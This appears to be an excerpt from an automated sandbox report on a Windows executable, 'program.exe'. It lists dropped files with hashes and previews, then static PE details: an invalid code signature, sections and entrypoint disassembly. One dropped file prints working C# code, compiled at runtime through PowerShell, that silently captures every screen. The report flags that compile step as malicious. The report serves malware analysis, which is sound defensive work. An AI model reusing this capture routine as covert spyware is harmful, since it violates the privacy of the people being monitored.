                                                                                                                                                                                                                                            SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                                                                                                                                                                                                                            SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                                                                                                                                                                                                                            SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                                                                                                                                                                                                                            Malicious:false
                                                                                                                                                                                                                                            Reputation:unknown
                                                                                                                                                                                                                                            Preview:# PowerShell test file to determine AppLocker lockdown mode

                                                                                                                                                                                                                                            C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_vn3w05kb.05b.ps1

                                                                                                                                                                                                                                            Download File
                                                                                                                                                                                                                                            Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                                                                                                            File Type:ASCII text, with no line terminators
                                                                                                                                                                                                                                            Category:dropped
                                                                                                                                                                                                                                            Size (bytes):60
                                                                                                                                                                                                                                            Entropy (8bit):4.038920595031593
                                                                                                                                                                                                                                            Encrypted:false
                                                                                                                                                                                                                                            SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                                                                                                                                                                                                                            MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                                                                                                                                                                                                                            SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                                                                                                                                                                                                                            SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                                                                                                                                                                                                                            SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                                                                                                                                                                                                                            Malicious:false
                                                                                                                                                                                                                                            Reputation:unknown
                                                                                                                                                                                                                                            Preview:# PowerShell test file to determine AppLocker lockdown mode

                                                                                                                                                                                                                                            C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_wft2jj1c.zul.ps1

                                                                                                                                                                                                                                            Download File
                                                                                                                                                                                                                                            Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                                                                                                            File Type:ASCII text, with no line terminators
                                                                                                                                                                                                                                            Category:dropped
                                                                                                                                                                                                                                            Size (bytes):60
                                                                                                                                                                                                                                            Entropy (8bit):4.038920595031593
                                                                                                                                                                                                                                            Encrypted:false
                                                                                                                                                                                                                                            SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                                                                                                                                                                                                                            MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                                                                                                                                                                                                                            SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                                                                                                                                                                                                                            SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                                                                                                                                                                                                                            SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                                                                                                                                                                                                                            Malicious:false
                                                                                                                                                                                                                                            Reputation:unknown
                                                                                                                                                                                                                                            Preview:# PowerShell test file to determine AppLocker lockdown mode

                                                                                                                                                                                                                                            C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_xcueelqq.hmr.psm1

                                                                                                                                                                                                                                            Download File
                                                                                                                                                                                                                                            Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                                                                                                            File Type:ASCII text, with no line terminators
                                                                                                                                                                                                                                            Category:dropped
                                                                                                                                                                                                                                            Size (bytes):60
                                                                                                                                                                                                                                            Entropy (8bit):4.038920595031593
                                                                                                                                                                                                                                            Encrypted:false
                                                                                                                                                                                                                                            SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                                                                                                                                                                                                                            MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                                                                                                                                                                                                                            SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                                                                                                                                                                                                                            SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                                                                                                                                                                                                                            SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                                                                                                                                                                                                                            Malicious:false
                                                                                                                                                                                                                                            Reputation:unknown
                                                                                                                                                                                                                                            Preview:# PowerShell test file to determine AppLocker lockdown mode

                                                                                                                                                                                                                                            C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_ylujjtvo.xgi.psm1

                                                                                                                                                                                                                                            Download File
                                                                                                                                                                                                                                            Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                                                                                                            File Type:ASCII text, with no line terminators
                                                                                                                                                                                                                                            Category:dropped
                                                                                                                                                                                                                                            Size (bytes):60
                                                                                                                                                                                                                                            Entropy (8bit):4.038920595031593
                                                                                                                                                                                                                                            Encrypted:false
                                                                                                                                                                                                                                            SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                                                                                                                                                                                                                            MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                                                                                                                                                                                                                            SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                                                                                                                                                                                                                            SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                                                                                                                                                                                                                            SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                                                                                                                                                                                                                            Malicious:false
                                                                                                                                                                                                                                            Reputation:unknown
                                                                                                                                                                                                                                            Preview:# PowerShell test file to determine AppLocker lockdown mode

                                                                                                                                                                                                                                            C:\Users\user\AppData\Local\Temp\tgmup5d5\CSC93ACBC84BC674220B3501D9F22ECFDE.TMP

                                                                                                                                                                                                                                            Download File
                                                                                                                                                                                                                                            Process:C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe
                                                                                                                                                                                                                                            File Type:MSVC .res
                                                                                                                                                                                                                                            Category:dropped
                                                                                                                                                                                                                                            Size (bytes):652
                                                                                                                                                                                                                                            Entropy (8bit):3.101546430152555
                                                                                                                                                                                                                                            Encrypted:false
                                                                                                                                                                                                                                            SSDEEP:12:DXt4Ii3ntuAHia5YA49aUGiqMZAiN5gryxRak7YnqqyWPN5Dlq5J:+RI+ycuZhNLRakSyWPNnqX
                                                                                                                                                                                                                                            MD5:BA752A5FCA821CBCF5DD3246EDBE5DBC
                                                                                                                                                                                                                                            SHA1:4255BFBC99E50EC6D4E62A6DBFFA602D803C8357
                                                                                                                                                                                                                                            SHA-256:25DB2A690D1ED72E06BEF2114C9A637422BFAB881ADA4A267903C8A30D8BE285
                                                                                                                                                                                                                                            SHA-512:2A3F8D4798E7F76E1CBEC771F5F1EE189E2BAAB87EC1A7A892518E464C75189756C7BB25E7B75865F11FBF42105C6D79C29A1B2E0936E4082F68518161B4A871
                                                                                                                                                                                                                                            Malicious:false
                                                                                                                                                                                                                                            Reputation:unknown
                                                                                                                                                                                                                                            Preview:.... ...........................L...<...............0...........L.4...V.S._.V.E.R.S.I.O.N._.I.N.F.O.............................?...........................D.....V.a.r.F.i.l.e.I.n.f.o.....$.....T.r.a.n.s.l.a.t.i.o.n...............S.t.r.i.n.g.F.i.l.e.I.n.f.o.........0.0.0.0.0.4.b.0...,.....F.i.l.e.D.e.s.c.r.i.p.t.i.o.n..... ...0.....F.i.l.e.V.e.r.s.i.o.n.....0...0...0...0...<.....I.n.t.e.r.n.a.l.N.a.m.e...t.g.m.u.p.5.d.5...d.l.l.....(.....L.e.g.a.l.C.o.p.y.r.i.g.h.t... ...D.....O.r.i.g.i.n.a.l.F.i.l.e.n.a.m.e...t.g.m.u.p.5.d.5...d.l.l.....4.....P.r.o.d.u.c.t.V.e.r.s.i.o.n...0...0...0...0...8.....A.s.s.e.m.b.l.y. .V.e.r.s.i.o.n...0...0...0...0...

                                                                                                                                                                                                                                            C:\Users\user\AppData\Local\Temp\tgmup5d5\tgmup5d5.0.cs

                                                                                                                                                                                                                                            Download File
                                                                                                                                                                                                                                            Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                                                                                                            File Type:Unicode text, UTF-8 (with BOM) text, with CRLF line terminators
                                                                                                                                                                                                                                            Category:dropped
                                                                                                                                                                                                                                            Size (bytes):1004
                                                                                                                                                                                                                                            Entropy (8bit):4.154581034278981
                                                                                                                                                                                                                                            Encrypted:false
                                                                                                                                                                                                                                            SSDEEP:24:Jo4KMz04F03wykl4qk6oAuBGOUBrRmLW+7UCPa:Jo4hz0BAl4xBQ0XQCC
                                                                                                                                                                                                                                            MD5:C76055A0388B713A1EABE16130684DC3
                                                                                                                                                                                                                                            SHA1:EE11E84CF41D8A43340F7102E17660072906C402
                                                                                                                                                                                                                                            SHA-256:8A3CD008E86A3D835F55F8415F5FD264C6DACDF0B7286E6854EA3F5A363390E7
                                                                                                                                                                                                                                            SHA-512:22D2804491D90B03BB4B640CB5E2A37D57766C6D82CAF993770DCF2CF97D0F07493C870761F3ECEA15531BD434B780E13AE065A1606681B32A77DBF6906FB4E2
                                                                                                                                                                                                                                            Malicious:false
                                                                                                                                                                                                                                            Reputation:unknown
                                                                                                                                                                                                                                            Preview:.using System;..using System.Collections.Generic;..using System.Drawing;..using System.Windows.Forms;....public class Screenshot..{.. public static List<Bitmap> CaptureScreens().. {.. var results = new List<Bitmap>();.. var allScreens = Screen.AllScreens;.... foreach (Screen screen in allScreens).. {.. try.. {.. Rectangle bounds = screen.Bounds;.. using (Bitmap bitmap = new Bitmap(bounds.Width, bounds.Height)).. {.. using (Graphics graphics = Graphics.FromImage(bitmap)).. {.. graphics.CopyFromScreen(new Point(bounds.Left, bounds.Top), Point.Empty, bounds.Size);.. }.... results.Add((Bitmap)bitmap.Clone());.. }.. }.. catch (Exception).. {.. // Handle any exceptions here.. }.. }.... return results;..

                                                                                                                                                                                                                                            C:\Users\user\AppData\Local\Temp\tgmup5d5\tgmup5d5.cmdline

                                                                                                                                                                                                                                            Download File
                                                                                                                                                                                                                                            Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                                                                                                            File Type:Unicode text, UTF-8 (with BOM) text, with very long lines (604), with no line terminators
                                                                                                                                                                                                                                            Category:dropped
                                                                                                                                                                                                                                            Size (bytes):607
                                                                                                                                                                                                                                            Entropy (8bit):5.3183786158253366
                                                                                                                                                                                                                                            Encrypted:false
                                                                                                                                                                                                                                            SSDEEP:12:p37Lvkmb6KOkqe1xBkrk+ikOfVYWZEifVV:V3ka6KOkqeFkOfzEifH
                                                                                                                                                                                                                                            MD5:822DB3FF250428786811115C9E2BE03C
                                                                                                                                                                                                                                            SHA1:8CF4EBEE47384B6194B417C2BC178794ABE9C4D1
                                                                                                                                                                                                                                            SHA-256:709DA68C368E585999EA8F1403DE20C414CE3396BA983A6D7C6FDCBDC97DEDD9
                                                                                                                                                                                                                                            SHA-512:C6AA23DDF82A18FE19FA0C77EDCABD4F7236AE420803B070282C8B866BC5A369B7AA76C1075BFBE4D1F21FC49E27D220E6A18835381304CE8488DC517D8F76DE
                                                                                                                                                                                                                                            Malicious:true
                                                                                                                                                                                                                                            Reputation:unknown
                                                                                                                                                                                                                                            Preview:./t:library /utf8output /R:"System.dll" /R:"C:\Windows\Microsoft.Net\assembly\GAC_MSIL\System.Management.Automation\v4.0_3.0.0.0__31bf3856ad364e35\System.Management.Automation.dll" /R:"System.Core.dll" /R:"C:\Windows\Microsoft.Net\assembly\GAC_MSIL\System.Drawing\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Drawing.dll" /R:"C:\Windows\Microsoft.Net\assembly\GAC_MSIL\System.Windows.Forms\v4.0_4.0.0.0__b77a5c561934e089\System.Windows.Forms.dll" /out:"C:\Users\user\AppData\Local\Temp\tgmup5d5\tgmup5d5.dll" /debug- /optimize+ /warnaserror /optimize+ "C:\Users\user\AppData\Local\Temp\tgmup5d5\tgmup5d5.0.cs"

                                                                                                                                                                                                                                            C:\Users\user\AppData\Local\Temp\tgmup5d5\tgmup5d5.dll

                                                                                                                                                                                                                                            Download File
                                                                                                                                                                                                                                            Process:C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe
                                                                                                                                                                                                                                            File Type:PE32 executable (DLL) (console) Intel 80386 Mono/.Net assembly, for MS Windows
                                                                                                                                                                                                                                            Category:dropped
                                                                                                                                                                                                                                            Size (bytes):4096
                                                                                                                                                                                                                                            Entropy (8bit):3.158720554758396
                                                                                                                                                                                                                                            Encrypted:false
                                                                                                                                                                                                                                            SSDEEP:48:6x7oEAtf0KhzBU/zf6mtJYN0RpW1ulLRa3yqq:LNz0GmwOxnK
                                                                                                                                                                                                                                            MD5:5573F8EB21DF323FA10495D5FCA8C20E
                                                                                                                                                                                                                                            SHA1:D959C1F23066B129BC1E88E3CA3D9843D0A6A221
                                                                                                                                                                                                                                            SHA-256:B7A9F45D2A1A771078C2435DB62E5043B69E5DD81FFA16F112E32F3FAF6FCAFD
                                                                                                                                                                                                                                            SHA-512:AE59E169703CF979DAD2DB9C346340F280DED6E472B9D946CBDEE85F3D4610D6F838EA1EDFD0FFECFCA299E50F0A9FB25997AC7F1DB1AF7C15E3EC7A7F908656
                                                                                                                                                                                                                                            Malicious:false
                                                                                                                                                                                                                                            Reputation:unknown
                                                                                                                                                                                                                                            Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L...O.9g...........!.................&... ...@....... ....................................@..................................%..K....@.......................`....................................................... ............... ..H............text...$.... ...................... ..`.rsrc........@......................@..@.reloc.......`......................@..B.................&......H.......<!...............................................................0..........s.....(...........8...........o.......(......(....s........(..........(......(....s....~......(....o........,...o........o....t....o........,...o.......&.....X.......i?k....*...(....B.(j........9.Q...........{.........(....*BSJB............v4.0.30319......l.......#~..........#Strings............#US.........#GUID...........#Blob...........G.........%3............................................

                                                                                                                                                                                                                                            C:\Users\user\AppData\Local\Temp\tgmup5d5\tgmup5d5.out

                                                                                                                                                                                                                                            Download File
                                                                                                                                                                                                                                            Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                                                                                                            File Type:Unicode text, UTF-8 (with BOM) text, with very long lines (708), with CRLF, CR line terminators
                                                                                                                                                                                                                                            Category:modified
                                                                                                                                                                                                                                            Size (bytes):1149
                                                                                                                                                                                                                                            Entropy (8bit):5.494287227791722
                                                                                                                                                                                                                                            Encrypted:false
                                                                                                                                                                                                                                            SSDEEP:24:KJfNkFGkId3ka6KOkqeFkOfzEifOKax5DqBVKVrdFAMBJTH:uNk/kka6NkqeFkyzEuOK2DcVKdBJj
                                                                                                                                                                                                                                            MD5:351F2263AE3B5F13CABD4BA7B4DFAD6B
                                                                                                                                                                                                                                            SHA1:5DEDAB24D1FBD0620889FD42D701596EE0282263
                                                                                                                                                                                                                                            SHA-256:0D6D72691CA8A93E0818CE251A4937FD95E69EB2D73E4E277C3F6E1386C9247D
                                                                                                                                                                                                                                            SHA-512:2AA0C24BD7D0EA83CA1E08ADE84E1847FB2C551DB1BF159B5CCA94F5760ED0EE14084EE0FB3245157F0BD4B6BD41B464F446F1340C1A3FC4CA38516F6FAD0845
                                                                                                                                                                                                                                            Malicious:false
                                                                                                                                                                                                                                            Reputation:unknown
                                                                                                                                                                                                                                            Preview:.C:\Users\user\AppData\Local\Temp\..........> "C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe" /t:library /utf8output /R:"System.dll" /R:"C:\Windows\Microsoft.Net\assembly\GAC_MSIL\System.Management.Automation\v4.0_3.0.0.0__31bf3856ad364e35\System.Management.Automation.dll" /R:"System.Core.dll" /R:"C:\Windows\Microsoft.Net\assembly\GAC_MSIL\System.Drawing\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Drawing.dll" /R:"C:\Windows\Microsoft.Net\assembly\GAC_MSIL\System.Windows.Forms\v4.0_4.0.0.0__b77a5c561934e089\System.Windows.Forms.dll" /out:"C:\Users\user\AppData\Local\Temp\tgmup5d5\tgmup5d5.dll" /debug- /optimize+ /warnaserror /optimize+ "C:\Users\user\AppData\Local\Temp\tgmup5d5\tgmup5d5.0.cs"......Microsoft (R) Visual C# Compiler version 4.8.4084.0...for C# 5..Copyright (C) Microsoft Corporation. All rights reserved.......This compiler is provided as part of the Microsoft (R) .NET Framework, but only supports language versions up to C# 5, which is no longe

                                                                                                                                                                                                                                            \Device\ConDrv

                                                                                                                                                                                                                                            Download File
                                                                                                                                                                                                                                            Process:C:\Program Files\Windows Defender\MpCmdRun.exe
                                                                                                                                                                                                                                            File Type:ASCII text, with CRLF line terminators
                                                                                                                                                                                                                                            Category:dropped
                                                                                                                                                                                                                                            Size (bytes):97
                                                                                                                                                                                                                                            Entropy (8bit):4.331807756485642
                                                                                                                                                                                                                                            Encrypted:false
                                                                                                                                                                                                                                            SSDEEP:3:lyAZFXZDLsFzAXmZrCZDL4QXAVJK4v:lyqBtoJAXmoZDL4CA1v
                                                                                                                                                                                                                                            MD5:195D02DA13D597A52F848A9B28D871F6
                                                                                                                                                                                                                                            SHA1:D048766A802C61655B9689E953103236EACCB1C7
                                                                                                                                                                                                                                            SHA-256:ADE5C28A2B27B13EFB1145173481C1923CAF78648E49205E7F412A2BEFC7716A
                                                                                                                                                                                                                                            SHA-512:1B9EDA54315B0F8DB8E43EC6E78996464A90E84DE721611647E8395DBE259C282F06FB6384B08933F8F0B452B42E23EE5A7439974ACC5F53DAD64B08D39F4146
                                                                                                                                                                                                                                            Malicious:false
                                                                                                                                                                                                                                            Reputation:unknown
                                                                                                                                                                                                                                            Preview:..Service Version: 0.0.0.0..Engine Version: 0.0.0.0....No engine/signature is currently loaded...

                                                                                                                                                                                                                                            Static File Info

                                                                                                                                                                                                                                            General

                                                                                                                                                                                                                                            File type:PE32+ executable (GUI) x86-64, for MS Windows
                                                                                                                                                                                                                                            Entropy (8bit):7.993357815338302
                                                                                                                                                                                                                                            TrID:
                                                                                                                                                                                                                                            • Win64 Executable GUI (202006/5) 92.65%
                                                                                                                                                                                                                                            • Win64 Executable (generic) (12005/4) 5.51%
                                                                                                                                                                                                                                            • Generic Win/DOS Executable (2004/3) 0.92%
                                                                                                                                                                                                                                            • DOS Executable Generic (2002/1) 0.92%
                                                                                                                                                                                                                                            • Autodesk FLIC Image File (extensions: flc, fli, cel) (7/3) 0.00%
                                                                                                                                                                                                                                            File name:program.exe
                                                                                                                                                                                                                                            File size:7'954'796 bytes
                                                                                                                                                                                                                                            MD5:3e6865657b29faea3a355c710f0aad45
                                                                                                                                                                                                                                            SHA1:ad9b98fa0f96685abc17aaab7fe4d65ac8fe34f7
                                                                                                                                                                                                                                            SHA256:2c48f7bc874f1c812c0031519e756c28f940a58b2f64cdb40a08f1ccc798f671
                                                                                                                                                                                                                                            SHA512:b360b5a244e83ee95719d7e781b9a49a29a5251e936619786b0151d0992aee33746109b3a8b0ab8d18c2788b738892c9b296c8c601025e16d850d730837b1615
                                                                                                                                                                                                                                            SSDEEP:196608:7YHYUNwfI9jUCzi4H1qSiXLGVi7DMgpZ3Q0VMwICEc/jL:4CIHziK1piXLGVE4Ue0VJ3
                                                                                                                                                                                                                                            TLSH:3A863301BA8019F6F6FB9A3DC8928019C47236A217A0D6FB172CD2790D735FA5D36763
                                                                                                                                                                                                                                            File Content Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......n=..*\.Z*\.Z*\.Za$.[-\.Za$.[.\.Za$.[ \.Z:..Z)\.Z:..[#\.Z:..[;\.Z:..[.\.Za$.[!\.Z*\.Z.\.Zb..[3\.Zb..[+\.ZRich*\.Z........PE..d..

                                                                                                                                                                                                                                            File Icon

                                                                                                                                                                                                                                            Icon Hash:90cececece8e8eb0

                                                                                                                                                                                                                                            Static PE Info

                                                                                                                                                                                                                                            General

                                                                                                                                                                                                                                            Entrypoint:0x14000cdb0
                                                                                                                                                                                                                                            Entrypoint Section:.text
                                                                                                                                                                                                                                            Digitally signed:true
                                                                                                                                                                                                                                            Imagebase:0x140000000
                                                                                                                                                                                                                                            Subsystem:windows gui
                                                                                                                                                                                                                                            Image File Characteristics:EXECUTABLE_IMAGE, LARGE_ADDRESS_AWARE
                                                                                                                                                                                                                                            DLL Characteristics:HIGH_ENTROPY_VA, DYNAMIC_BASE, NX_COMPAT, GUARD_CF, TERMINAL_SERVER_AWARE
                                                                                                                                                                                                                                            Time Stamp:0x671A1EED [Thu Oct 24 10:18:21 2024 UTC]
                                                                                                                                                                                                                                            TLS Callbacks:
                                                                                                                                                                                                                                            CLR (.Net) Version:
                                                                                                                                                                                                                                            OS Version Major:6
                                                                                                                                                                                                                                            OS Version Minor:0
                                                                                                                                                                                                                                            File Version Major:6
                                                                                                                                                                                                                                            File Version Minor:0
                                                                                                                                                                                                                                            Subsystem Version Major:6
                                                                                                                                                                                                                                            Subsystem Version Minor:0
                                                                                                                                                                                                                                            Import Hash:72c4e339b7af8ab1ed2eb3821c98713a

                                                                                                                                                                                                                                            Authenticode Signature

                                                                                                                                                                                                                                            Signature Valid:false
                                                                                                                                                                                                                                            Signature Issuer:CN=Sectigo Public Code Signing CA EV R36, O=Sectigo Limited, C=GB
                                                                                                                                                                                                                                            Signature Validation Error:The digital signature of the object did not verify
                                                                                                                                                                                                                                            Error Number:-2146869232
                                                                                                                                                                                                                                            Not Before, Not After
                                                                                                                                                                                                                                            • 29/09/2021 01:00:00 29/09/2024 00:59:59
                                                                                                                                                                                                                                            Subject Chain
                                                                                                                                                                                                                                            • CN=Akeo Consulting, O=Akeo Consulting, S=Donegal, C=IE, OID.2.5.4.15=Private Organization, OID.1.3.6.1.4.1.311.60.2.1.3=IE, SERIALNUMBER=407950
                                                                                                                                                                                                                                            Version:3
                                                                                                                                                                                                                                            Thumbprint MD5:5C82B2D08EFE6EE0794B52D4309C5F37
                                                                                                                                                                                                                                            Thumbprint SHA-1:3DBC3A2A0E9CE8803B422CFDBC60ACD33164965D
                                                                                                                                                                                                                                            Thumbprint SHA-256:60E992275CC7503A3EBA5D391DB8AEAAAB001402D49AEA3F7F5DA3706DF97327
                                                                                                                                                                                                                                            Serial:00BFB15001BBF592D4962A7797EA736FA3

                                                                                                                                                                                                                                            Entrypoint Preview

                                                                                                                                                                                                                                            Instruction
                                                                                                                                                                                                                                            dec eax
                                                                                                                                                                                                                                            sub esp, 28h
                                                                                                                                                                                                                                            call 00007F26ACB08E6Ch
                                                                                                                                                                                                                                            dec eax
                                                                                                                                                                                                                                            add esp, 28h
                                                                                                                                                                                                                                            jmp 00007F26ACB08A8Fh
                                                                                                                                                                                                                                            int3
                                                                                                                                                                                                                                            int3
                                                                                                                                                                                                                                            int3
                                                                                                                                                                                                                                            int3
                                                                                                                                                                                                                                            int3
                                                                                                                                                                                                                                            int3
                                                                                                                                                                                                                                            int3
                                                                                                                                                                                                                                            int3
                                                                                                                                                                                                                                            int3
                                                                                                                                                                                                                                            int3
                                                                                                                                                                                                                                            int3
                                                                                                                                                                                                                                            int3
                                                                                                                                                                                                                                            int3
                                                                                                                                                                                                                                            int3
                                                                                                                                                                                                                                            dec eax
                                                                                                                                                                                                                                            sub esp, 28h
                                                                                                                                                                                                                                            call 00007F26ACB09238h
                                                                                                                                                                                                                                            test eax, eax
                                                                                                                                                                                                                                            je 00007F26ACB08C33h
                                                                                                                                                                                                                                            dec eax
                                                                                                                                                                                                                                            mov eax, dword ptr [00000030h]
                                                                                                                                                                                                                                            dec eax
                                                                                                                                                                                                                                            mov ecx, dword ptr [eax+08h]
                                                                                                                                                                                                                                            jmp 00007F26ACB08C17h
                                                                                                                                                                                                                                            dec eax
                                                                                                                                                                                                                                            cmp ecx, eax
                                                                                                                                                                                                                                            je 00007F26ACB08C26h
                                                                                                                                                                                                                                            xor eax, eax
                                                                                                                                                                                                                                            dec eax
                                                                                                                                                                                                                                            cmpxchg dword ptr [0003577Ch], ecx
                                                                                                                                                                                                                                            jne 00007F26ACB08C00h
                                                                                                                                                                                                                                            xor al, al
                                                                                                                                                                                                                                            dec eax
                                                                                                                                                                                                                                            add esp, 28h
                                                                                                                                                                                                                                            ret
                                                                                                                                                                                                                                            mov al, 01h
                                                                                                                                                                                                                                            jmp 00007F26ACB08C09h
                                                                                                                                                                                                                                            int3
                                                                                                                                                                                                                                            int3
                                                                                                                                                                                                                                            int3
                                                                                                                                                                                                                                            dec eax
                                                                                                                                                                                                                                            sub esp, 28h
                                                                                                                                                                                                                                            test ecx, ecx
                                                                                                                                                                                                                                            jne 00007F26ACB08C19h
                                                                                                                                                                                                                                            mov byte ptr [00035765h], 00000001h
                                                                                                                                                                                                                                            call 00007F26ACB08365h
                                                                                                                                                                                                                                            call 00007F26ACB09650h
                                                                                                                                                                                                                                            test al, al
                                                                                                                                                                                                                                            jne 00007F26ACB08C16h
                                                                                                                                                                                                                                            xor al, al
                                                                                                                                                                                                                                            jmp 00007F26ACB08C26h
                                                                                                                                                                                                                                            call 00007F26ACB1616Fh
                                                                                                                                                                                                                                            test al, al
                                                                                                                                                                                                                                            jne 00007F26ACB08C1Bh
                                                                                                                                                                                                                                            xor ecx, ecx
                                                                                                                                                                                                                                            call 00007F26ACB09660h
                                                                                                                                                                                                                                            jmp 00007F26ACB08BFCh
                                                                                                                                                                                                                                            mov al, 01h
                                                                                                                                                                                                                                            dec eax
                                                                                                                                                                                                                                            add esp, 28h
                                                                                                                                                                                                                                            ret
                                                                                                                                                                                                                                            int3
                                                                                                                                                                                                                                            int3
                                                                                                                                                                                                                                            inc eax
                                                                                                                                                                                                                                            push ebx
                                                                                                                                                                                                                                            dec eax
                                                                                                                                                                                                                                            sub esp, 20h
                                                                                                                                                                                                                                            cmp byte ptr [0003572Ch], 00000000h
                                                                                                                                                                                                                                            mov ebx, ecx
                                                                                                                                                                                                                                            jne 00007F26ACB08C79h
                                                                                                                                                                                                                                            cmp ecx, 01h
                                                                                                                                                                                                                                            jnbe 00007F26ACB08C7Ch
                                                                                                                                                                                                                                            call 00007F26ACB091AEh
                                                                                                                                                                                                                                            test eax, eax
                                                                                                                                                                                                                                            je 00007F26ACB08C3Ah
                                                                                                                                                                                                                                            test ebx, ebx
                                                                                                                                                                                                                                            jne 00007F26ACB08C36h
                                                                                                                                                                                                                                            dec eax
                                                                                                                                                                                                                                            lea ecx, dword ptr [00035716h]
                                                                                                                                                                                                                                            call 00007F26ACB15F62h

                                                                                                                                                                                                                                            Data Directories

                                                                                                                                                                                                                                            NameVirtual AddressVirtual Size Is in Section
                                                                                                                                                                                                                                            IMAGE_DIRECTORY_ENTRY_EXPORT0x00x0
                                                                                                                                                                                                                                            IMAGE_DIRECTORY_ENTRY_IMPORT0x3ca5c0x78.rdata
                                                                                                                                                                                                                                            IMAGE_DIRECTORY_ENTRY_RESOURCE0x470000x94c.rsrc
                                                                                                                                                                                                                                            IMAGE_DIRECTORY_ENTRY_EXCEPTION0x440000x2250.pdata
                                                                                                                                                                                                                                            IMAGE_DIRECTORY_ENTRY_SECURITY0x793d240x2448
                                                                                                                                                                                                                                            IMAGE_DIRECTORY_ENTRY_BASERELOC0x480000x764.reloc
                                                                                                                                                                                                                                            IMAGE_DIRECTORY_ENTRY_DEBUG0x3a0800x1c.rdata
                                                                                                                                                                                                                                            IMAGE_DIRECTORY_ENTRY_COPYRIGHT0x00x0
                                                                                                                                                                                                                                            IMAGE_DIRECTORY_ENTRY_GLOBALPTR0x00x0
                                                                                                                                                                                                                                            IMAGE_DIRECTORY_ENTRY_TLS0x00x0
                                                                                                                                                                                                                                            IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG0x39f400x140.rdata
                                                                                                                                                                                                                                            IMAGE_DIRECTORY_ENTRY_BOUND_IMPORT0x00x0
                                                                                                                                                                                                                                            IMAGE_DIRECTORY_ENTRY_IAT0x2b0000x4a0.rdata
                                                                                                                                                                                                                                            IMAGE_DIRECTORY_ENTRY_DELAY_IMPORT0x00x0
                                                                                                                                                                                                                                            IMAGE_DIRECTORY_ENTRY_COM_DESCRIPTOR0x00x0
                                                                                                                                                                                                                                            IMAGE_DIRECTORY_ENTRY_RESERVED0x00x0

                                                                                                                                                                                                                                            Sections

                                                                                                                                                                                                                                            NameVirtual AddressVirtual SizeRaw SizeMD5Xored PEZLIB ComplexityFile TypeEntropyCharacteristics
                                                                                                                                                                                                                                            .text0x10000x29f000x2a0002a7ae207b6295492e9da088072661752False0.5514439174107143data6.487454925709845IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
                                                                                                                                                                                                                                            .rdata0x2b0000x12a500x12c009c4484e90874011862810022cd067d0bFalse0.5244791666666667data5.752673446570296IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ
                                                                                                                                                                                                                                            .data0x3e0000x53f80xe00dba0caeecab624a0ccc0d577241601d1False0.134765625data1.8392217063172436IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
                                                                                                                                                                                                                                            .pdata0x440000x22500x2400f5559f14427a02f0a5dbd0dd026cae54False0.470703125data5.291665041994019IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ
                                                                                                                                                                                                                                            .rsrc0x470000x94c0xa00e7b5af0a11bf12adf33a686e43d0f46bFalse0.425data5.109629462188209IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ
